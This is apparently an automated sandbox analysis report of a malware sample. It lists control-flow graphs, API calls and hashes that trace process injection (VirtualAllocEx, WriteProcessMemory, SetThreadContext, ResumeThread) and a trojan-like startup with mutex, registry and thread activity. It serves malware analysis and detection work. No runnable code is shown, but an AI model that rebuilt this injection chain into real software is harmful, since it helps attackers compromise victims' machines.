                                                                          • Instruction Fuzzy Hash: 394177B5D002589FCF00CFA9D984AEEFBF5BB49314F24902AE818BB250D375A945CF64

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 457 2ec627b-2ec62ef 460 2ec6306-2ec6365 WriteProcessMemory 457->460 461 2ec62f1-2ec6303 457->461 462 2ec636e-2ec63b8 460->462 463 2ec6367-2ec636d 460->463 461->460 463->462
                                                                          APIs
                                                                          • WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,?), ref: 02EC6355
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1854140939.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2ec0000_x.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          • Opcode ID: d32d5c833763c4e483fe4d7ed0befab48c7b5a54638606b39593a8c5f5225082
                                                                          • Instruction ID: f6a99a0c9e048bb20694c2da9b0020d23da6cd2d9a60db26db6c4557e8badd3f
                                                                          • Opcode Fuzzy Hash: d32d5c833763c4e483fe4d7ed0befab48c7b5a54638606b39593a8c5f5225082
                                                                          • Instruction Fuzzy Hash: 414156B5D002589FCF00CFA9D984ADEFBF5BB49314F24902AE828BB250D375A955CF64

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 467 2ec4c78-2ec5d7c ReadProcessMemory 473 2ec5d7e-2ec5d84 467->473 474 2ec5d85-2ec5dcf 467->474 473->474
                                                                          APIs
                                                                          • ReadProcessMemory.KERNELBASE(00000004,?,02EC5C8B,?,?), ref: 02EC5D6C
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1854140939.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2ec0000_x.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessRead
                                                                          • String ID:
                                                                          • API String ID: 1726664587-0
                                                                          • Opcode ID: c97cdbdcd9925d1f1f5c1263224315b31da4c73260a78cecef32aa66f2f8c3dc
                                                                          • Instruction ID: 087552f748d04a0c52afaadb6c4cba9a0831b142fa00aca50d7714f43ddc8176
                                                                          • Opcode Fuzzy Hash: c97cdbdcd9925d1f1f5c1263224315b31da4c73260a78cecef32aa66f2f8c3dc
                                                                          • Instruction Fuzzy Hash: B641A9B5D052589FCF00CFA9D984ADEFBF1BB0A310F24A06AE818B7211D375A945CF64

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 478 2ec5cb0-2ec5cb5 479 2ec5d0b-2ec5d7c ReadProcessMemory 478->479 480 2ec5cb7-2ec5d0a 478->480 483 2ec5d7e-2ec5d84 479->483 484 2ec5d85-2ec5dcf 479->484 480->479 483->484
                                                                          APIs
                                                                          • ReadProcessMemory.KERNELBASE(00000004,?,02EC5C8B,?,?), ref: 02EC5D6C
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1854140939.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2ec0000_x.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessRead
                                                                          • String ID:
                                                                          • API String ID: 1726664587-0
                                                                          • Opcode ID: 27202cbb1c9ad4f8225c66c67a5b237a51be4a89cbf6563a28d1ffb4bc43883b
                                                                          • Instruction ID: fe8b815fc3078246e506f31165dd7c4509a310505781934e58c4d94b3a151f37
                                                                          • Opcode Fuzzy Hash: 27202cbb1c9ad4f8225c66c67a5b237a51be4a89cbf6563a28d1ffb4bc43883b
                                                                          • Instruction Fuzzy Hash: 14418BB5D012589FCF10CFA9D984AEEFBF1BB49310F14A11AE814B7250D375A941CF64

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 488 2ec4c84-2ec5d7c ReadProcessMemory 493 2ec5d7e-2ec5d84 488->493 494 2ec5d85-2ec5dcf 488->494 493->494
                                                                          APIs
                                                                          • ReadProcessMemory.KERNELBASE(00000004,?,02EC5C8B,?,?), ref: 02EC5D6C
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1854140939.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2ec0000_x.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessRead
                                                                          • String ID:
                                                                          • API String ID: 1726664587-0
                                                                          • Opcode ID: c160ed19e72a335186ea5e21d8860d705a5f85c1ef8d4d4b36c6adc5e1c31c3e
                                                                          • Instruction ID: b4952a8f1db5af022f50848e625f6bb9a4bd074f08858cc34b1c27b0f3d4b422
                                                                          • Opcode Fuzzy Hash: c160ed19e72a335186ea5e21d8860d705a5f85c1ef8d4d4b36c6adc5e1c31c3e
                                                                          • Instruction Fuzzy Hash: EC4178B5D052589FCB10CFA9D984ADEFBF1BB09310F24A02AE814B7310D375A946CF64

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 498 2ec4c90-2ec5f29 503 2ec5f2b-2ec5f94 VirtualAllocEx 498->503 504 2ec5f9d-2ec5fdf 503->504 505 2ec5f96-2ec5f9c 503->505 505->504
                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(00000000,?,?,?,?), ref: 02EC5F84
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1854140939.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2ec0000_x.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 1cfffcee657e919d865ee4cceda93b601b329e2605ce4056f295e4d348caa077
                                                                          • Instruction ID: f687858b5e419e5bd17b8cc8ac1e952fa32227e29ca2163a0f30f3c9c9d91254
                                                                          • Opcode Fuzzy Hash: 1cfffcee657e919d865ee4cceda93b601b329e2605ce4056f295e4d348caa077
                                                                          • Instruction Fuzzy Hash: 904179B5D052589FCB10CFA9D984ADEFBF1EB19310F20A01AE818B7310D775A945CB64
                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(00000000,?,?,?,?), ref: 02EC5F84
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1854140939.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2ec0000_x.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 8305eaf2d11669a3b1923aad13936d4e8ed7b8cc5193dc9f2b02c3c35fe95ec9
                                                                          • Instruction ID: 086fae71ff81db4a323ee21b07fd9a22671cb4e48790a50e480b9c7a8c37c473
                                                                          • Opcode Fuzzy Hash: 8305eaf2d11669a3b1923aad13936d4e8ed7b8cc5193dc9f2b02c3c35fe95ec9
                                                                          • Instruction Fuzzy Hash: 694158B5D012589FCB14CFA9D984ADEFBB1FB59310F20A42AE818B7310D375A946CF64
                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(00000000,?,?,?,?), ref: 02EC5F84
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1854140939.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2ec0000_x.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: f72da3ea406e6ad08ed78d232a0801b08901e57c7ca56569da0de5148206137c
                                                                          • Instruction ID: 3d672ae192170eb4783fec71deaa488e1d452880cecdaef05b2edb2f8835f333
                                                                          • Opcode Fuzzy Hash: f72da3ea406e6ad08ed78d232a0801b08901e57c7ca56569da0de5148206137c
                                                                          • Instruction Fuzzy Hash: AA4158B9D052589FCB10CFA9D984A9EFBF1FB19310F20A41AE818B7310D375A946CF64
                                                                          APIs
                                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 02EC5BD9
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1854140939.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2ec0000_x.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          • Opcode ID: 8c03e9dfdff27a7e4c24dc3ac18ca02f122316914c5b76f3b42d7bb063e29fcc
                                                                          • Instruction ID: 6512a7a57d2556e1e2f78af49072733516af750934450500e065d25f727f2006
                                                                          • Opcode Fuzzy Hash: 8c03e9dfdff27a7e4c24dc3ac18ca02f122316914c5b76f3b42d7bb063e29fcc
                                                                          • Instruction Fuzzy Hash: 1D4188B4D012589FCB10CFAAD984ADEFBF0BB49314F20902AE418B7351D778A946CF64
                                                                          APIs
                                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 02EC5BD9
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1854140939.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2ec0000_x.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          • Opcode ID: 31eaa142a5075e7aacedd00ff23273d35a74948b959927a36da064ea944e2fc3
                                                                          • Instruction ID: 8506aa9eae0d742355e4dc2247def759ff97b6d3bf062b1dbda4b0faf4690828
                                                                          • Opcode Fuzzy Hash: 31eaa142a5075e7aacedd00ff23273d35a74948b959927a36da064ea944e2fc3
                                                                          • Instruction Fuzzy Hash: 2C4188B4D012589FCB10CFAAD984ADEFBF0BB49314F20902AE418B7350D778A946CF64
                                                                          APIs
                                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 02EC5BD9
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1854140939.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2ec0000_x.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          • Opcode ID: 02c9ba9cff9259f0496a7c397b74f98f5bdbded1f93911cc2ee3bf27b22f8d09
                                                                          • Instruction ID: 8264ab06d6a4505a6f3567903c0c579966aaff832f7f395f16afb2143dbd4d66
                                                                          • Opcode Fuzzy Hash: 02c9ba9cff9259f0496a7c397b74f98f5bdbded1f93911cc2ee3bf27b22f8d09
                                                                          • Instruction Fuzzy Hash: 104198B5D012589FCB10CFAAD984ADEFBF0BB49314F24902AE418B7350D778A946CF64
                                                                          APIs
                                                                          • ResumeThread.KERNELBASE(00000000), ref: 02EC668D
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1854140939.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2ec0000_x.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: 3b933d843004820c71fe69f7fd7d493101466c87b163d15c3f038f6a6336f65d
                                                                          • Instruction ID: 4ac2e23f644ee07b682516ed0084bacf6a58b732745d10a4c7bf83a60338c708
                                                                          • Opcode Fuzzy Hash: 3b933d843004820c71fe69f7fd7d493101466c87b163d15c3f038f6a6336f65d
                                                                          • Instruction Fuzzy Hash: 9331C9B4D012189FCB10DFA9D984A9EFBF4FB49310F20902AE818B7310D735A901CFA8
                                                                          APIs
                                                                          • ResumeThread.KERNELBASE(00000000), ref: 02EC668D
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1854140939.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2ec0000_x.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: 1084727fa8f007c0b00b4c243918bd4b6355ef5e2b23c1fcf0f0e881aa5ba83e
                                                                          • Instruction ID: 1222b8d3aeb0bbea9bd4a0cd3e386b7ed6fd95397de80577771259bdb7ea1838
                                                                          • Opcode Fuzzy Hash: 1084727fa8f007c0b00b4c243918bd4b6355ef5e2b23c1fcf0f0e881aa5ba83e
                                                                          • Instruction Fuzzy Hash: 6E31AAB4D012189FCB10DFA9D984A9EFBF4FB49314F20906AE818B7310C735A905CFA4

                                                                          Execution Graph

                                                                          Execution Coverage:0.7%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:4.2%
                                                                          Total number of Nodes:456
                                                                          Total number of Limit Nodes:20
                                                                          execution_graph 46412 4047eb WaitForSingleObject 46413 404805 SetEvent CloseHandle 46412->46413 46414 40481c closesocket 46412->46414 46415 40489c 46413->46415 46416 404829 46414->46416 46417 40483f 46416->46417 46425 404ab1 83 API calls 46416->46425 46419 404851 WaitForSingleObject 46417->46419 46420 404892 SetEvent CloseHandle 46417->46420 46426 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 46419->46426 46420->46415 46422 404860 SetEvent WaitForSingleObject 46427 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 46422->46427 46424 404878 SetEvent CloseHandle CloseHandle 46424->46420 46425->46417 46426->46422 46427->46424 46428 402bcc 46429 402bd7 46428->46429 46430 402bdf 46428->46430 46446 403315 28 API calls _Deallocate 46429->46446 46432 402beb 46430->46432 46436 4015d3 46430->46436 46433 402bdd 46438 43360d 46436->46438 46439 402be9 46438->46439 46442 43362e std::_Facet_Register 46438->46442 46447 43a88c 46438->46447 46454 442200 7 API calls 2 library calls 46438->46454 46441 433dec std::_Facet_Register 46456 437bd7 RaiseException 46441->46456 46442->46441 46455 437bd7 RaiseException 46442->46455 46444 433e09 46446->46433 46452 446aff _strftime 46447->46452 46448 446b3d 46458 445354 20 API calls _Atexit 46448->46458 46449 446b28 RtlAllocateHeap 46451 446b3b 46449->46451 46449->46452 46451->46438 46452->46448 46452->46449 46457 442200 7 API calls 2 library calls 46452->46457 46454->46438 46455->46441 46456->46444 46457->46452 46458->46451 46459 4339be 46460 4339ca ___BuildCatchObject 46459->46460 46491 4336b3 46460->46491 46462 4339d1 46463 433b24 46462->46463 46466 4339fb 46462->46466 46787 433b44 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46463->46787 46465 433b2b 46778 4426be 46465->46778 46475 433a3a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46466->46475 46781 4434d1 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 46466->46781 46471 433a14 46473 433a1a 46471->46473 46782 443475 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 46471->46782 46481 433a9b 46475->46481 46783 43edf4 35 API calls 4 library calls 46475->46783 46502 433c5e 46481->46502 46485 433abd 46485->46465 46486 433ac1 46485->46486 46487 433aca 46486->46487 46785 442661 28 API calls _Atexit 46486->46785 46786 433842 13 API calls 2 library calls 46487->46786 46490 433ad2 46490->46473 46492 4336bc 46491->46492 46789 433e0a IsProcessorFeaturePresent 46492->46789 46494 4336c8 46790 4379ee 10 API calls 3 library calls 46494->46790 46496 4336cd 46501 4336d1 46496->46501 46791 44335e 46496->46791 46499 4336e8 46499->46462 46501->46462 46857 436050 46502->46857 46504 433c71 GetStartupInfoW 46505 433aa1 46504->46505 46506 443422 46505->46506 46858 44ddc9 46506->46858 46508 44342b 46510 433aaa 46508->46510 46862 44e0d3 35 API calls 46508->46862 46511 40d767 46510->46511 46864 41bce3 LoadLibraryA GetProcAddress 46511->46864 46513 40d783 GetModuleFileNameW 46869 40e168 32 API calls 2 library calls 46513->46869 46515 40d79f 46870 401fbd 28 API calls 46515->46870 46517 40d7ae 46871 401fbd 28 API calls 46517->46871 46519 40d7bd 46872 41afc3 28 API calls 46519->46872 46521 40d7c6 46873 40e8bd 11 API calls 46521->46873 46523 40d7cf 46874 401d8c 11 API calls 46523->46874 46525 40d7d8 46526 40d835 46525->46526 46527 40d7eb 46525->46527 46875 401d64 22 API calls 46526->46875 46890 40e986 90 API calls 46527->46890 46530 40d845 46876 401d64 22 API calls 46530->46876 46531 40d7fd 46891 401d64 22 API calls 46531->46891 46534 40d864 46877 404cbf 28 API calls 46534->46877 46536 40d809 46892 40e937 65 API calls 46536->46892 46537 40d873 46878 405ce6 28 API calls 46537->46878 46540 40d87f 46879 401eef 11 API calls 46540->46879 46541 40d824 46893 40e155 65 API calls 46541->46893 46544 40d88b 46880 401eea 11 API calls 46544->46880 46546 40d894 46881 401eea 11 API calls 46546->46881 46549 40dc9f 46784 433c94 GetModuleHandleW 46549->46784 46550 40d89d 46882 401d64 22 API calls 46550->46882 46552 40d8a6 46883 401ebd 28 API calls 46552->46883 46554 40d8b1 46884 401d64 22 API calls 46554->46884 46556 40d8ca 46885 401d64 22 API calls 46556->46885 46558 40d946 46575 40e134 46558->46575 46886 401d64 22 API calls 46558->46886 46559 40d8e5 46559->46558 46894 4085b4 28 API calls 46559->46894 46562 40d912 46895 401eef 11 API calls 46562->46895 46564 40d91e 46896 401eea 11 API calls 46564->46896 46565 40d9a4 46887 40bed7 46565->46887 46566 40d95d 46566->46565 46898 4124b7 RegOpenKeyExA RegQueryValueExA RegCloseKey 46566->46898 46569 40d927 46897 4124b7 RegOpenKeyExA RegQueryValueExA RegCloseKey 46569->46897 46570 40d9aa 46571 40d82d 46570->46571 46900 41a463 33 API calls 46570->46900 46933 401eea 11 API calls 46571->46933 46988 412902 30 API calls 46575->46988 46576 40d9c5 46579 40da18 46576->46579 46901 40697b RegOpenKeyExA RegQueryValueExA RegCloseKey 46576->46901 46577 40d988 46577->46565 46899 412902 30 API calls 46577->46899 46906 401d64 22 API calls 46579->46906 46583 40da21 46592 40da32 46583->46592 46593 40da2d 46583->46593 46584 40d9e0 46586 40d9e4 46584->46586 46587 40d9ee 46584->46587 46585 40e14a 46989 4112b5 64 API calls ___scrt_fastfail 46585->46989 46902 40699d 30 API calls 46586->46902 46904 401d64 22 API calls 46587->46904 46908 401d64 22 API calls 46592->46908 46907 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 46593->46907 46594 40d9e9 46903 4064d0 97 API calls 46594->46903 46598 40da3b 46909 41ae08 28 API calls 46598->46909 46600 40d9f7 46600->46579 46603 40da13 46600->46603 46601 40da46 46910 401e18 11 API calls 46601->46910 46905 4064d0 97 API calls 46603->46905 46605 40da51 46911 401e13 11 API calls 46605->46911 46607 40da5a 46912 401d64 22 API calls 46607->46912 46609 40da63 46913 401d64 22 API calls 46609->46913 46611 40da7d 46914 401d64 22 API calls 46611->46914 46613 40da97 46915 401d64 22 API calls 46613->46915 46615 40db22 46618 40db2c 46615->46618 46623 40dcaa ___scrt_fastfail 46615->46623 46616 40dab0 46616->46615 46916 401d64 22 API calls 46616->46916 46619 40db35 46618->46619 46625 40dbb1 46618->46625 46922 401d64 22 API calls 46619->46922 46621 40db3e 46923 401d64 22 API calls 46621->46923 46622 40dac5 _wcslen 46622->46615 46917 401d64 22 API calls 46622->46917 46934 41265d RegOpenKeyExA RegQueryValueExA RegCloseKey 46623->46934 46649 40dbac ___scrt_fastfail 46625->46649 46627 40db50 46924 401d64 22 API calls 46627->46924 46628 40dae0 46918 401d64 22 API calls 46628->46918 46631 40db62 46925 401d64 22 API calls 46631->46925 46633 40daf5 46919 40c89e 31 API calls 46633->46919 46634 40dcef 46935 401d64 22 API calls 46634->46935 46638 40db8b 46926 401d64 22 API calls 46638->46926 46639 40dd16 46936 401f66 28 API calls 46639->46936 46640 40db08 46920 401e18 11 API calls 46640->46920 46642 40db14 46921 401e13 11 API calls 46642->46921 46646 40db9c 46927 40bc67 45 API calls _wcslen 46646->46927 46647 40dd25 46937 4126d2 14 API calls 46647->46937 46648 40db1d 46648->46615 46649->46625 46928 4128a2 31 API calls 46649->46928 46653 40dd3b 46938 401d64 22 API calls 46653->46938 46654 40dc45 ctype 46929 401d64 22 API calls 46654->46929 46656 40dd47 46939 43a5e7 39 API calls _swprintf 46656->46939 46659 40dd54 46662 40dd81 46659->46662 46940 41beb0 86 API calls ___scrt_fastfail 46659->46940 46660 40dc5c 46660->46634 46930 401d64 22 API calls 46660->46930 46941 401f66 28 API calls 46662->46941 46663 40dc7e 46931 41ae08 28 API calls 46663->46931 46667 40dd65 CreateThread 46667->46662 46998 41c96f 10 API calls 46667->46998 46668 40dd96 46942 401f66 28 API calls 46668->46942 46669 40dc87 46932 40e219 109 API calls 46669->46932 46672 40dda5 46943 41a686 79 API calls 46672->46943 46673 40dc8c 46673->46634 46675 40dc93 46673->46675 46675->46571 46676 40ddaa 46944 401d64 22 API calls 46676->46944 46678 40ddb6 46945 401d64 22 API calls 46678->46945 46680 40ddcb 46946 401d64 22 API calls 46680->46946 46682 40ddeb 46947 43a5e7 39 API calls _swprintf 46682->46947 46684 40ddf8 46948 401d64 22 API calls 46684->46948 46686 40de03 46949 401d64 22 API calls 46686->46949 46688 40de14 46950 401d64 22 API calls 46688->46950 46690 40de29 46951 401d64 22 API calls 46690->46951 46692 40de3a 46693 40de41 StrToIntA 46692->46693 46952 409517 142 API calls _wcslen 46693->46952 46695 40de53 46953 401d64 22 API calls 46695->46953 46697 40dea1 46956 401d64 22 API calls 46697->46956 46698 40de5c 46698->46697 46954 43360d 22 API calls 3 library calls 46698->46954 46701 40de71 46955 401d64 22 API calls 46701->46955 46703 40de84 46704 40de8b CreateThread 46703->46704 46704->46697 46993 419128 102 API calls __EH_prolog 46704->46993 46705 40def9 46959 401d64 22 API calls 46705->46959 46706 40deb1 46706->46705 46957 43360d 22 API calls 3 library calls 46706->46957 46709 40dec6 46958 401d64 22 API calls 46709->46958 46711 40ded8 46716 40dedf CreateThread 46711->46716 46712 40df6c 46965 401d64 22 API calls 46712->46965 46713 40df02 46713->46712 46960 401d64 22 API calls 46713->46960 46716->46705 46999 419128 102 API calls __EH_prolog 46716->46999 46717 40df1e 46961 401d64 22 API calls 46717->46961 46718 40df75 46719 40dfba 46718->46719 46966 401d64 22 API calls 46718->46966 46970 41a7a2 29 API calls 46719->46970 46723 40df33 46962 40c854 31 API calls 46723->46962 46724 40dfc3 46971 401e18 11 API calls 46724->46971 46725 40df8a 46967 401d64 22 API calls 46725->46967 46727 40dfce 46972 401e13 11 API calls 46727->46972 46731 40df46 46963 401e18 11 API calls 46731->46963 46733 40dfd7 CreateThread 46738 40e004 46733->46738 46739 40dff8 CreateThread 46733->46739 46994 40e54f 82 API calls 46733->46994 46734 40df9f 46968 43a5e7 39 API calls _swprintf 46734->46968 46735 40df52 46964 401e13 11 API calls 46735->46964 46740 40e019 46738->46740 46741 40e00d CreateThread 46738->46741 46739->46738 46995 410f36 138 API calls 46739->46995 46745 40e073 46740->46745 46973 401f66 28 API calls 46740->46973 46741->46740 46996 411524 38 API calls ___scrt_fastfail 46741->46996 46743 40df5b CreateThread 46743->46712 46997 40196b 49 API calls 46743->46997 46744 40dfac 46969 40b95c 7 API calls 46744->46969 46978 41246e RegOpenKeyExA RegQueryValueExA RegCloseKey 46745->46978 46748 40e046 46974 404c9e 28 API calls 46748->46974 46751 40e08b 46753 40e12a 46751->46753 46979 41ae08 28 API calls 46751->46979 46752 40e053 46975 401f66 28 API calls 46752->46975 46986 40cbac 27 API calls 46753->46986 46756 40e062 46976 41a686 79 API calls 46756->46976 46758 40e12f 46987 413fd4 168 API calls 46758->46987 46759 40e0a4 46980 412584 31 API calls 46759->46980 46762 40e067 46977 401eea 11 API calls 46762->46977 46765 40e0ba 46981 401e13 11 API calls 46765->46981 46767 40e0ed DeleteFileW 46768 40e0f4 46767->46768 46769 40e0c5 46767->46769 46982 41ae08 28 API calls 46768->46982 46769->46767 46769->46768 46770 40e0db Sleep 46769->46770 46770->46769 46772 40e104 46983 41297a RegOpenKeyExW RegDeleteValueW 46772->46983 46774 40e117 46984 401e13 11 API calls 46774->46984 46776 40e121 46985 401e13 11 API calls 46776->46985 47001 44243b 46778->47001 46781->46471 46782->46475 46783->46481 46784->46485 46785->46487 46786->46490 46787->46465 46789->46494 46790->46496 46795 44e949 46791->46795 46794 437a17 8 API calls 3 library calls 46794->46501 46798 44e966 46795->46798 46799 44e962 46795->46799 46797 4336da 46797->46499 46797->46794 46798->46799 46801 4489ad 46798->46801 46813 433d2c 46799->46813 46802 4489b9 ___BuildCatchObject 46801->46802 46820 444acc EnterCriticalSection 46802->46820 46804 4489c0 46821 44ef64 46804->46821 46806 4489cf 46807 4489de 46806->46807 46832 448841 23 API calls 46806->46832 46834 4489fa LeaveCriticalSection std::_Lockit::~_Lockit 46807->46834 46810 4489d9 46833 4488f7 GetStdHandle GetFileType 46810->46833 46811 4489ef __fread_nolock 46811->46798 46814 433d37 IsProcessorFeaturePresent 46813->46814 46815 433d35 46813->46815 46817 4341a4 46814->46817 46815->46797 46856 434168 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46817->46856 46819 434287 46819->46797 46820->46804 46822 44ef70 ___BuildCatchObject 46821->46822 46823 44ef94 46822->46823 46824 44ef7d 46822->46824 46835 444acc EnterCriticalSection 46823->46835 46843 445354 20 API calls _Atexit 46824->46843 46827 44efcc 46844 44eff3 LeaveCriticalSection std::_Lockit::~_Lockit 46827->46844 46828 44ef82 __fread_nolock 46828->46806 46829 44efa0 46829->46827 46836 44eeb5 46829->46836 46832->46810 46833->46807 46834->46811 46835->46829 46845 448706 46836->46845 46838 44eec7 46842 44eed4 46838->46842 46852 44772e 11 API calls 2 library calls 46838->46852 46840 44ef26 46840->46829 46853 446ac5 20 API calls _free 46842->46853 46843->46828 46844->46828 46846 448713 _strftime 46845->46846 46847 448753 46846->46847 46848 44873e RtlAllocateHeap 46846->46848 46854 442200 7 API calls 2 library calls 46846->46854 46855 445354 20 API calls _Atexit 46847->46855 46848->46846 46849 448751 46848->46849 46849->46838 46852->46838 46853->46840 46854->46846 46855->46849 46856->46819 46857->46504 46859 44dddb 46858->46859 46860 44ddd2 46858->46860 46859->46508 46863 44dcc8 48 API calls 4 library calls 46860->46863 46862->46508 46863->46859 46865 41bd22 LoadLibraryA GetProcAddress 46864->46865 46866 41bd12 GetModuleHandleA GetProcAddress 46864->46866 46867 41bd4b 32 API calls 46865->46867 46868 41bd3b LoadLibraryA GetProcAddress 46865->46868 46866->46865 46867->46513 46868->46867 46869->46515 46870->46517 46871->46519 46872->46521 46873->46523 46874->46525 46875->46530 46876->46534 46877->46537 46878->46540 46879->46544 46880->46546 46881->46550 46882->46552 46883->46554 46884->46556 46885->46559 46886->46566 46990 401e8f 46887->46990 46889 40bee1 CreateMutexA GetLastError 46889->46570 46890->46531 46891->46536 46892->46541 46894->46562 46895->46564 46896->46569 46897->46558 46898->46577 46899->46565 46900->46576 46901->46584 46902->46594 46903->46587 46904->46600 46905->46579 46906->46583 46907->46592 46908->46598 46909->46601 46910->46605 46911->46607 46912->46609 46913->46611 46914->46613 46915->46616 46916->46622 46917->46628 46918->46633 46919->46640 46920->46642 46921->46648 46922->46621 46923->46627 46924->46631 46925->46638 46926->46646 46927->46649 46928->46654 46929->46660 46930->46663 46931->46669 46932->46673 46933->46549 46934->46634 46935->46639 46936->46647 46937->46653 46938->46656 46939->46659 46940->46667 46941->46668 46942->46672 46943->46676 46944->46678 46945->46680 46946->46682 46947->46684 46948->46686 46949->46688 46950->46690 46951->46692 46952->46695 46953->46698 46954->46701 46955->46703 46956->46706 46957->46709 46958->46711 46959->46713 46960->46717 46961->46723 46962->46731 46963->46735 46964->46743 46965->46718 46966->46725 46967->46734 46968->46744 46969->46719 46970->46724 46971->46727 46972->46733 46973->46748 46974->46752 46975->46756 46976->46762 46977->46745 46978->46751 46979->46759 46980->46765 46981->46769 46982->46772 46983->46774 46984->46776 46985->46753 46986->46758 46992 419e89 104 API calls 46987->46992 46988->46585 46991 401e94 46990->46991 47000 411637 62 API calls 46995->47000 47002 442447 _Atexit 47001->47002 47003 442460 47002->47003 47004 44244e 47002->47004 47025 444acc EnterCriticalSection 47003->47025 47037 442595 GetModuleHandleW 47004->47037 47007 442453 47007->47003 47038 4425d9 GetModuleHandleExW 47007->47038 47008 442505 47026 442545 47008->47026 47012 442467 47012->47008 47014 4424dc 47012->47014 47046 4431ef 20 API calls _Atexit 47012->47046 47015 4424f4 47014->47015 47047 443475 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 47014->47047 47048 443475 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 47015->47048 47016 442522 